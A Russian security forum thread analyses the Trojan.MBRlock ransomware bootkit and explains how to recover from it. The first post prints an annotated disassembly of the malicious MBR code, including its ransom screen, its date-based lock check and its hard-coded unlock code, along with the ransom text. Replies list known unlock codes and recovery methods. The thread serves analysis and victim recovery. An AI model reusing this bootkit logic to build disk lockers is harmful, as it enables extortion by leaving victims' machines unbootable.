• Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.

Trojan.MBRlock-SMS вымогатель

iskander-k

Ассоциация VN/VIP
VIP
Сообщения
3,733
Симпатии
2,432
#1
Trojan.MBRlock
C развитием систем безопасности операционных систем и появлением всё более сложных продуктов обеспечения защиты системы не отстают и авторы вредоносных программ. Если ранее написание вирусов представляло собой определённый вид спорта и способ самоутверждения, то сейчас это - серьёзный бизнес с серьёзным оборотом. А потому, чтобы оставаться на рынке необходимо придумывать всё более и новые уловки обхода систем защиты.

Однако, как показывает опыт, всё новое - это хорошо забытое старое. Ещё в эпоху бесплатной операционной системы от тогда ещё молодой и бескорыстной компании Microsoft - MS-DOS - существовали вирусы, поражающие загрузочный сектор. Прошло более 10 лет - и они вернулись в форме буткитов: вредоносного кода, подменяющего загрузочную запись операционной системы с целью выполнения злонамеренных операций на этапе ранней загрузки. "Злонамеренные операции" могут быть самые разные - внедрение библиотеки в адресное пространство процессов, противодействие антивирусом и многое другое. Сегодня нашей целью будет рассмотрение MBRLock - вредоносного вымогателя.

С 2007 года получили огромное распространение "винлокеры" - вредоносные программы, целью которых была блокировка или нарушение нормальной работы системы с требованием выкупа. О них достаточно хорошо написано в одном из блогов "Лаборатории Касперского". Сегодня мы разберём код того самого винлокера, который лаборатория назвала "самым труднодоступным".

Вначале - немного теории. Итак, загрузочные вирусы заражают загрузочный (boot) сектор или Master Boot Record (MBR) винчестера. Принцип действия загрузочных вирусов основан на алгоритмах запуска операционной системы при включении или перезагрузке компьютера - после необходимых тестов установленного оборудования (памяти, дисков и т.д.) программа системной загрузки считывает первый физический сектор загрузочного диска (A:, C: или CD-ROM в зависимости от параметров, установленных в BIOS Setup) и передает на него управление.
В случае винчестера управление получает программа, расположенная в MBR винчестера. Эта программа анализирует таблицу разбиения диска (Disk Partition Table), вычисляет адрес активного boot-сектора (обычно этим сектором является boot-сектор диска C:), загружает его в память и передает на него управление. Получив управление, активный boot-сектор винчестера проделывает те же действия, что и boot-сектор дискеты.

При заражении дисков загрузочные вирусы "подставляют" свой код вместо какой-либо программы, получающей управление при загрузке системы. Принцип заражения, таким образом, одинаков во всех описанных выше способах: вирус "заставляет" систему при ее перезапуске считать в память и отдать управление не оригинальному коду загрузчика, а коду вируса.

Вирус в большинстве случаев переносит оригинальный boot-сектор (или MBR) в какой-либо другой сектор диска (например, в первый свободный). Если длина вируса больше длины сектора, то в заражаемый сектор помещается первая часть вируса, остальные части размещаются в других секторах (например, в первых свободных).

При заражении системы программа обходит UAC (защитный функционал Windows), поэтому установка в систему происходит незаметно. После установки троянец прописывается в главную загрузочную запись и близлежащие сектора жесткого диска. В главной загрузочной записи жесткого диска после заражения появляется код, который загружает информацию с соседних секторов диска. Как следствие — на экран выводятся требования злоумышленников заплатить за разблокировку системы определённую сумму.

В сообщении в числе прочего говорится о том, что содержимое всех дисков компьютера якобы зашифровано и попытка самостоятельно вылечить приведет якобы к уничтожению всех данных на диске. Это не соответствует действительности. В любом случае после факта заражения лечение из самой системы становится невозможным, т. к. она даже не начинает загружаться.

При вводе верного пароля происходит восстановление исходного состояния загрузочной области диска, и загрузка установленной операционной системы происходит в обычном режиме.

В настоящее время известно несколько модификаций Trojan.MBRlock.

Исследование кода блокера в MBR

Ниже приводятся дампы кода вымогателя с пояснениями по основному функционалу каждой части.

; Чтение сектора №9 с первого физического устройства
; в память по адресу 186A:0000
Код:
00000000: BA8000        mov        dx, 00080
00000003: B90900        mov        cx, 9
00000006: B80102        mov        ax, 00201
00000009: 686A18        push        0186A
0000000C: 07            pop        es
0000000D: 31DB            xor        bx, bx
0000000F: CD13            int        013
00000011: 686A18        push        0186A
00000014: 1F            pop        ds
; Запуск прочитанного кода (проверка на истечение срока блокировки)
Код:
00000015: 9A00006A18        callf        186A:0000
0000001A: 31DB            xor        bx, bx
0000001C: 8EDB            mov        ds, bx
0000001E: 8EC3            mov        es, bx
00000020: 8ED3            mov        ss, bx
00000022: 40            inc        ax
; Если ах = 0, срок блокировки истек
Код:
00000023: 0F840F01        jz        000000136
; Чтение сектора №3 с первого физического устройства
; в память по адресу 0000:1000 (для знакогенератора)
Код:
00000027: BA8000        mov        dx, 00080
0000002A: B90300        mov        cx, 3
0000002D: B80302        mov        ax, 00203
00000030: BB0010        mov        bx, 01000
00000033: CD13            int        013
00000035: 7305            jnc        00000003C
; Если ошибка чтения, вывести ‘G’
Код:
00000037: B8470E        mov        ax, 00E47
0000003A: CD10            int        010
; Загрузить знакогенератор в память (64 символа с кода 192, 16 байт на символ)
Код:
0000003C: B80011        mov        ax, 01100
0000003F: BD0010        mov        bp, 01000
00000042: B94000        mov        cx, 00040
00000045: BAC000        mov        dx, 000C0
00000048: B710            mov        bh, 010
0000004A: B300            mov        bl, 0
0000004C: CD10            int        010
; Чтение сектора №4 с первого физического устройства
; в память по адресу 0000:3000 (текст сообщения вымогателя)
Код:
0000004E: BA8000        mov        dx, 00080
00000051: B90500        mov        cx, 5
00000054: B80402        mov        ax, 00204
00000057: BB0030        mov        bx, 03000
0000005A: CD13            int        013
0000005C: 6660            pushad
; Вывод сообщения на экран
Код:
0000005E: B80113        mov        ax, 01301
00000061: BB0C00        mov        bx, 0000C
00000064: B93007        mov        cx, 00730
00000067: 31D2            xor        dx, dx
00000069: BD0030        mov        bp, 03000
0000006C: CD10            int        010
0000006E: 6661            popad
00000070: 6660            pushad
; Вывод строки запроса кода
Код:
00000072: B80113        mov        ax, 01301
00000075: BB0E00        mov        bx, 0000E
00000078: B90C00        mov        cx, 0000C
0000007B: BA0017        mov        dx, 01700
0000007E: BD527D        mov        bp, 07D52
00000081: CD10            int        010
00000083: 6661            popad
; Чтение символа и запись по адресу 6C00
Код:
00000085: BF006C        mov        di, 06C00
00000088: B400            mov        ah, 0
0000008A: 57            push        di
0000008B: CD16            int        016
0000008D: 5F            pop        di
0000008E: EB37            jmps        0000000C7
; Нажат Backspace
Код:
00000090: 3C08            cmp        al, 8
00000092: 7533            jnz        0000000C7
00000094: 6660            pushad
00000096: B403            mov        ah, 3
00000098: B700            mov        bh, 0
0000009A: 80FA0D        cmp        dl, 00D
0000009D: CD10            int        010
0000009F: 6661            popad
000000A1: 76E5            jbe        000000088
000000A3: 6660            pushad
000000A5: B403            mov        ah, 3
000000A7: B700            mov        bh, 0
000000A9: CD10            int        010
000000AB: 52            push        dx
000000AC: FECA            dec        dl
000000AE: B700            mov        bh,0
000000B0: B402            mov        ah,2
000000B2: CD10            int        010
000000B4: B8200E        mov        ax, 00E20
000000B7: CD10            int        010
000000B9: 5A            pop        dx
000000BA: FECA            dec        dl
000000BC: B700            mov        bh,0
000000BE: B402            mov        ah,2
000000C0: CD10            int        010
000000C2: 6661            popad
000000C4: 4F            dec        di
000000C5: EBC1            jmps        000000088
; == Проверка вводимых символов ==
Код:
000000C7: 3C0D            cmp        al, 00D
; Если нажата клавиша Enter,
; сравниваем с кодом разблокировки
Код:
000000C9: 7555            jnz        000000120
000000CB: BEA57D        mov        si, 07DA5
000000CE: BF006C        mov        di, 06C00
000000D1: B500            mov        ch, 0
000000D3: 8A0EA47D        mov        cl, [07DA4]
000000D7: F3A6            rep        cmpsb
000000D9: 745B            jz        000000136
000000DB: 6660            pushad
; Если неверно,
; установить курсор в строку 17 столбец 12
Код:
000000DD: B402            mov        ah, 2
000000DF: B700            mov        bh, 0
000000E1: BA0C17        mov        dx, 0170C
000000E4: CD10            int        010
; записать 100 пробелов
Код:
000000E6: B8200A        mov        ax, 00A20
000000E9: B96400        mov        cx, 00064
000000EC: CD10            int        010
; задержка в 50000h микросекунд
Код:
000000EE: B90500        mov        cx, 5
000000F1: 31D2            xor        dx, dx
000000F3: B486            mov        ah, 086
000000F5: CD15            int        015
; вывод сообщения об ошибке
Код:
000000F7: B80113        mov        ax, 01301
000000FA: BB0C00        mov        bx, 0000C
000000FD: B90600        mov        cx, 6
00000100: BA0018        mov        dx, 01800
00000103: E80600        call        00000010C
00000106: 0D4572        0Dh, ‘Error’
; на повторный ввод
Код:
0000010C: 5D            pop        bp
0000010D: CD10            int        010
0000010F: B402            mov        ah, 2
00000111: B700            mov        bh, 0
00000113: BA0C17        mov        dx, 0170C
00000116: CD10            int        010
00000118: 6661            popad
0000011A: BF006C        mov        di, 06C00
0000011D: E968FF        jmp        000000088
; допустимы символы с кодами 32 - 126
Код:
00000120: 3C20            cmp        al, 020
00000122: 0F8262FF        jc        000000088
00000126: 3C7E            cmp        al, 07E
00000128: 0F875CFF        ja        000000088
0000012C: AA            stosb
0000012D: B40E            mov        ah, 00E
0000012F: 57            push        di
00000130: CD10            int        010
00000132: 5F            pop        di
00000133: E952FF        jmp        000000088
; введен правильный код или истек срок блокировки
Код:
00000136: 6A00            push        0
00000138: 07            pop        es
; уменьшить на 1К размер (типично для буткитов)
Код:
00000139: FF0E1304        dec        w,[00413]
; получить размер доступной основной памяти
Код:
0000013D: CD12            int        012
; Переводим в параграфы
Код:
0000013F: C1E006        shl        ax, 6
; Копируем в начало блока 70 байт со смещения 0000015E
; и передаем ему управление
Код:
00000142: 8EC0            mov        es, ax
00000144: 31FF            xor        di, di
00000146: BE5E7D        mov        si, 07D5E
00000149: B94600        mov        cx, 00046
0000014C: F3A4            rep        movsb
0000014E: 06            push        es
0000014F: 6A00            push        0
00000151: CB            retf
00000152: 45            ‘Enter code: ’
0000015E: 6660            pushad
00000160: B80113        mov        ax, 01301
00000163: BB0800        mov        bx, 8
00000166: B90E00        mov        cx, 0000E
00000169: BA0018        mov        dx, 01800
0000016C: E80E00        call        00000017D
0000016F: 4C            ‘Loading OS…’, 0Dh
0000017D: 5D            pop        bp
0000017E: CD10            int        010
00000180: 6661            popad
00000182: 6A00            push        0
00000184: 07            pop        es
; восстановление оригинального MBR из сектора №2
; и запуск нормального загрузчика
Код:
00000185: B280            mov        dl, 080
00000187: B90200        mov        cx, 2
0000018A: B80102        mov        ax, 00201
0000018D: BB007C        mov        bx, 07C00
00000190: CD13            int        013
00000192: B280            mov        dl, 080
00000194: B90100        mov        cx, 1
00000197: B80103        mov        ax, 00301
0000019A: BB007C        mov        bx, 07C00
0000019D: CD13            int        013
0000019F: EA007C0000        jmpf        00000:07C00
Код:
; Длина кода разблокировки
000001A4: 06
; Код разблокировки         
000001A5: 3837            ‘875082’

Ваш компьютер заблокирован за просмотр запрещенного видео порнографического
содержания с участием несовершеннолетних. Для разблокировки Вам необходимо:
пополнить счет абонента БИЛАЙН 89688432698 на сумму 500 руб. После оплаты,
на выданном терминалом чеке оплаты, вы найдете код, который необходимо ввести
в форму ввода кода расположенную ниже. После ввода кода, Ваш ПК автоматически
разблокируется.
Удалите все незаконно расположенные материалы с Вашего ПК после разблокировки.
В случае отказа от оплаты все данные на вашем ПК будут безвозвратно уничтожены,
тк представляют опасность для других пользователей сети интернет

Код:
00001000: 6660            pushad
00001002: E80000        call        000001005
00001005: 5D            pop        bp
; Чтение регистра статуса часов реального времени
Код:
00001006: B00B            mov        al, 00B
00001008: E670            out        070, al
0000100A: E471            in        al, 071
; Обнуление 2 бита (установка режима BCD даты)
Код:
0000100C: 0CFB            or        al,-5
0000100E: E671            out        071, al
; == Получение текущего года ==
; Получение века
Код:
00001010: 31C0            xor        ax, ax
00001012: B032            mov        al, 032
00001014: E670            out        070, al
00001016: E471            in        al, 071
00001018: D410            aam        010
0000101A: D50A            aad
0000101C: 6BC064        imul        ax, ax, 064
0000101F: 93            xchg        bx, ax
; Получение последних двух цифр года
Код:
00001020: 31C0            xor        ax, ax
00001022: B009            mov        al, 9
00001024: E670            out        070, al
00001026: E471            in        al, 071
00001028: D410            aam        010
0000102A: D50A            aad
0000102C: 01C3            add        bx, ax
; Сравнение со словом по адресу [01188]
; (год = 2011 или 07DBh)
Код:
0000102E: 8DB68301        lea        si, [bp][00183]
00001032: 3B1C            cmp        bx,    [si]
00001034: 7602            jbe        000001038
; Если год больше, установка флага снятия блокировки
Код:
00001036: EB74            jmps        0000010AC
00001038: 3B1C            cmp        bx, [si]
; Совпадение текущего года, переход к проверке текущего месяца
Код:
0000103A: 7403            jz        00000103F
; Блокировка продолжается
Код:
0000103C: 6661            popad
0000103E: CB            retf
0000103F: B008            mov        al, 8
00001041: E670            out        070, al
00001043: E471            in        al, 071
00001045: D410            aam        010
00001047: D50A            aad
; Сравнение с байтом по адресу [0118A]
; (месяц = 05 или май)
Код:
00001049: 8DB68501        lea        si, [bp][00185]
0000104D: 3A04            cmp        al, [si]
0000104F: 7602            jbe        000001053
; Если месяц больше, установка флага снятия блокировки
Код:
00001051: EB59            jmps        0000010AC
00001053: 3A04            cmp        al, [si]
; Совпадение текущего месяца, переход к проверке текущей даты
Код:
00001055: 7403            jz        00000105A
; Блокировка продолжается
Код:
00001057: 6661            popad
00001059: CB            retf
0000105A: B007            mov        al, 7
0000105C: E670            out        070, al
0000105E: E471            in        al, 071
00001060: D410            aam        010
00001062: D50A            aad
; Сравнение с байтом по адресу [0118В]
; (дата = 22 или 16h)
Код:
00001064: 8DB68601        lea        si, [bp][00186]
00001068: 3A04            cmp        al, [si]
0000106A: 7602            jbe        00000106E
0000106C: EB3E            jmps        0000010AC
0000106E: 3A04            cmp        al, [si]
; Совпадение текущей даты, переход к проверке текущего часа
Код:
00001070: 7403            jz        000001075
; Блокировка продолжается
Код:
00001072: 6661            popad
00001074: CB            retf
00001075: B004            mov        al, 4
00001077: E670            out        070, al
00001079: E471            in        al, 071
0000107B: D410            aam        010
0000107D: D50A            aad
; Сравнение с байтом по адресу [0118C]
; (час = 19 или 13h)
Код:
0000107F: 678DB587010000    lea        si, [ebp][00187]
00001086: 3A04            cmp        al, [si]
00001088: 7602            jbe        00000108C
0000108A: EB20            jmps        0000010AC
0000108C: 3A04            cmp        al, [si]
; Совпадение текущего часа, переход к проверке текущей минуты
Код:
0000108E: 7403            jz        000001093
; Блокировка продолжается
Код:
00001090: 6661            popad
00001092: CB            retf
00001093: B002            mov        al, 2
00001095: E670            out        070,al
00001097: E471            in        al, 071
00001099: D410            aam        010
0000109B: D50A            aad
; Сравнение с байтом по адресу [0118D]
; (минута = 4)
Код:
0000109D: 8DB68801        lea        si, [bp][00188]
000010A1: 3A04            cmp        al, [si]
000010A3: 7602            jbe        0000010A7
000010A5: EB05            jmps        0000010AC
; Блокировка продолжается
Код:
000010A7: 6661            popad
000010A9: 31C0            xor        ax, ax
000010AB: CB            retf
; Установка флага снятия блокировки
Код:
000010AC: 6661            popad
000010AE: B8FFFF        mov        ax,-1
000010B1: CB            retf
; Этот код нигде не вызывается (возможно остался от дропера)
Код:
000010B2: 6660            pushad
000010B4: 9C            pushf
000010B5: E80000        call        0000010B8
000010B8: 5D            pop        bp
000010B9: 31C0            xor        ax, ax
000010BB: 9D            popf
000010BC: 6661            popad
000010BE: 50            push        ax
000010BF: B020            mov        al, 020
000010C1: E620            out        020, al
000010C3: 58            pop        ax
000010C4: EAE9006018        jmpf        01860:000E9
000010C9: CF            iret

000010E9: B40E            mov        ah, 00Eh
000010EB: B031            mov        al, 031
000010ED: CD10            int        010
000010EF: EBF8            jmps        0000010E9
000010F1: B40E            mov        ah, 00E
000010F3: B032            mov        al, 032
000010F5: CD10            int        010
000010F7: EBF8            jmps        0000010F1
000010F9: 669C            #UD(16)
000010FB: 6660            pushad
000010FD: 66C1C018        rol        eax, 018
00001101: B90200        mov        cx, 2
00001104: EB14            jmps        00000111A
00001106: 669C            #UD(16)
00001108: 6660            pushad
0000110A: 66C1C010        rol        eax, 010
0000110E: B90400        mov        cx, 4
00001111: EB07            jmps        00000111A
00001113: 669C            #UD(16)
00001115: 6660            pushad
00001117: B90800        mov        cx, 8
0000111A: 66C1C004        rol        eax, 4
0000111E: 6650            push        eax
00001120: 240F            and        al, 00F
00001122: 3C0A            cmp        al, 00A
00001124: 7304            jnc        00000112A
00001126: 0430            add        al, 030
00001128: EB02            jmps        00000112C
0000112A: 0437            add        al, 037
0000112C: B40E            mov        ah, 00E
0000112E: CD10            int        010
00001130: 6658            pop        eax
00001132: E2E6            loop        00000111A
00001134: 6661            popad
00001136: 669D            #UD(16)
00001138: C3            retn
00001139: B032            mov        al, 032
0000113B: E83000        call        00000116E
0000113E: B009            mov        al, 9
00001140: E82B00        call        00000116E
00001143: B02D            mov        al, 02D
00001145: CD29            int        029
00001147: B008            mov        al, 8
00001149: E82200        call        00000116E
0000114C: B02D            mov        al, 02D
0000114E: CD29            int        029
00001150: B007            mov        al, c7
00001152: E81900        call        00000116E
00001155: B020            mov        al, 020
00001157: CD29            int        029
00001159: B004            mov        al, 4
0000115B: E81000        call        00000116E
0000115E: B068            mov        al, 068
00001160: CD29            int        029
00001162: B020            mov        al, 020
00001164: CD29            int        029
00001166: B002            mov        al, 2
00001168: E80300        call        00000116E
0000116B: 6661            popad
0000116D: CB            retf

0000116E: E670            out        070, al
00001170: E471            in        al, 071
00001172: 50            push        ax
00001173: C0E804        shr        al, 4
00001176: 0430            add        al, 030
00001178: AA            stosb
00001179: 58            pop        ax
0000117A: 240F            and        al, 00F
0000117C: 0430            add        al, 030
0000117E: AA            stosb
0000117F: C3            retn
; Структура хранения данных блокировщика
Код:
00001180: 44            ‘DATETIME’
00001188: DB07
0000118A: 05
0000118B: 16
0000118C: 13
0000118D: 04

Информация по анализу блокера предоставлена thyrex

Необходимо учитывать, что код разблокировки можно найти в дампе "зараженного" MBR



Что облегчает процесс поиска кода разблокировки.
________________________________

Для лечения от Trojan.MBRlock: необходимо выполнить следующие рекомендации:
1.попробовать ввести известные коды
Код:
[LIST]
[*]ekol
[*]jail
[*]777888
[*]zpo4301
[*]zzp0193
[*]281056
[*]098SWO
[*]875082
[*]692058
[/LIST]
2.Загрузить LiveCD от DrWeb или Kaspersky Rescue Disk (с обновленными базами) записать на диск и загрузив зараженный компьютер при помощи этого диска просканировать жесткий диск - найденное вылечить.

Что касается лечения вручную - учитывая то, что судя по коду зловред не шифрует оригинальную MBR, то поможет любая утилита, способная отыскать среди секторов 1..63 любой сектор с сигнатурой в конце 55AAh и переместить его на место сектора 0, таким образом, восстановив оригинальную MBR и таблицу разделов.

________________________________

________________________________

  • Если вы можете дополнить данное описание, прошу не стеснятся и отписываться в этой теме.
 
Последнее редактирование:

thyrex

Ассоциация VN/VIP
VIP
Сообщения
2,368
Симпатии
2,443
#3
Таблица разделов начинается со смещения 1B0

Она не перемещена и даже не повреждена. По крайней мере пока
Но попадались сообщения, что fixmbr не помогает. Может по причине отсутствия у пользователей специфических умений по ее применению
 

akok

Команда форума
Администратор
Сообщения
14,789
Симпатии
12,156
#5
Таблица разделов начинается со смещения 1B0
http://vms.drweb.com/virus/?i=589788 - тогда немного непонятно это описание.

НЕ рекомендуется для лечения использовать утилиты, позволяющие восстанавливать стандартный MBR, т.к. в этом случае не происходит восстановление таблицы разделов диска.
Добавлено через 1 минуту 4 секунды
http://forum.drweb.com/index.php?showtopic=302460&view=findpost&p=520922

если вирус стер mbr своим телом (включая таблицу разделов)
Добавлено через 2 минуты 5 секунд
Так или иначе лучше обратиться к использованию LiveCD (ЛК или DrWeb-возможно) в которые вшиты "лечилки". Если не помогли коды разблокировки.
 

iskander-k

Ассоциация VN/VIP
VIP
Сообщения
3,733
Симпатии
2,432
#8
Это другая разновидность
Да другая , но принцип в общем-то тот же самый .....

Добавлено через 14 минут 7 секунд
Еще данный о трояне
Trojan.MBRlock (output.exe)
[

This trojan blocker ( MD5: 1a0f12cc7736b07fb153733c7494d76e ) prevents all software execution.
To remove the Trojan (and unlock windows), infected users need to enter a valid serial number.
output.exe VirusTotal: https://www.virustotal.com/file-sca...49b13b384b49d5456316f3b1a2fe19b9ec-1303456070

The main executable modify your MBR and launch a reboot procedure, when rebooted you see this:

It says after three days the unlock is not possible, but it's alway possible.
That just a way to scare user and push them to call the service.
Attention ! Windows activation period is exceeded.
This windows copy is illegal and not registered properly.
The further work is not possible.
For activating this copy of windows yo must enter registration code.

This code you can find in your windows distribution package.
If you not find them you can receive it by the phone: +423 877 0158.
Registration code must be entered not later then three days, if it entered later the unlocking is not possible
For unlock your computer, enter any 14 chars (or more) serial.
Example: XYLIBOXXYLIBOX
Just after having typed Enter (al = 0d in key code), it check the lenght of your serial (value in DI) and that all.

The original MBR is not lost.


When a valid serial is entered, the infected part is gone
 
Последнее редактирование:

zerikua

Активный пользователь
Сообщения
34
Симпатии
16
#10
От себя добавлю, что стандартный подход как fixmbr скорее всего не сработает т.к. зловредом перемещена таблица разделов.
довольно спорное заявление мы тоже изучали данный вопрос и результаты можно посмотреть тут:

[INFO]результаты можно запостить без лишней рекламы других ресурсов, что запрещено правилами.[/INFO]
 
Последнее редактирование модератором:

akok

Команда форума
Администратор
Сообщения
14,789
Симпатии
12,156
#12
Может быть, а может и параллельное исследование. :)
 

gjf

Ассоциация VN
Разработчик
Сообщения
646
Симпатии
643
#13
Я не о том. Конечно, это не плагиат. Но просто когда публикуешь что-то на внешнем тематическом ресурсе - поиск никто не отменял, всегда есть вероятность, что ты опоздал и твоё исследование уже изжёвано вдоль и поперёк.

Ребятам бы лучше такую инфу у себя писать, а то поищешь - и как-то печально становится:

Trojan-Ransom.Win32.Mbro.aa
Время детектирования 04 июн 2011 07:07 MSK
Время выпуска обновления 04 июн 2011 12:57 MSK

Описание сгенерировано автоматически на основании анализа действий сэмпла этого детектируемого объекта на тестовом компьютере и может содержать неточную информацию.

Резюме

* Выполняет потенциально-опасные действия


Технические детали

Имеет размер 37888 байт.

Инсталляция

После запуска создает свои копии под следующими именами:

* Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\x2z8.exe

Создает следующие файлы на зараженном компьютере:

* Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\fpath.txt


Прочие действия

Производит запуск следующих файлов (команд):

* Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\x2z8.exe Каталог для хранения временных файлов ОС Windows (обычно, C:\Documents and Settings\<Имя_текущего_пользователя>\Local Settings\Temp)%Temp%\x2z8.exe
 

akok

Команда форума
Администратор
Сообщения
14,789
Симпатии
12,156
#15
Прочел статью еще раз. Но как извлечь код для разблокировки я так и не увидел.
 

gjf

Ассоциация VN
Разработчик
Сообщения
646
Симпатии
643
#17
Ну да. Название статьи, её тема и то, что просили осветить было наконец-то освещено одним предложением в пост-скриптуме после нескольких страниц не по теме ;)
 

iskander-k

Ассоциация VN/VIP
VIP
Сообщения
3,733
Симпатии
2,432
#18
Как бы нечаянный плагиат?
Легкий обзор по нескольким статьям (почти одинакового содержания)
и комментарий на

Прочел статью еще раз. Но как извлечь код для разблокировки я так и не увидел.
что просили осветить было наконец-то освещено одним предложением в пост-скриптуме после нескольких страниц не по теме
ну так статью -то нужно было там написать и пояснения полезны к этому зверю. И если бы еще и показали скрин с этим самым ключом было бы тоже здорово.
 
Сверху Снизу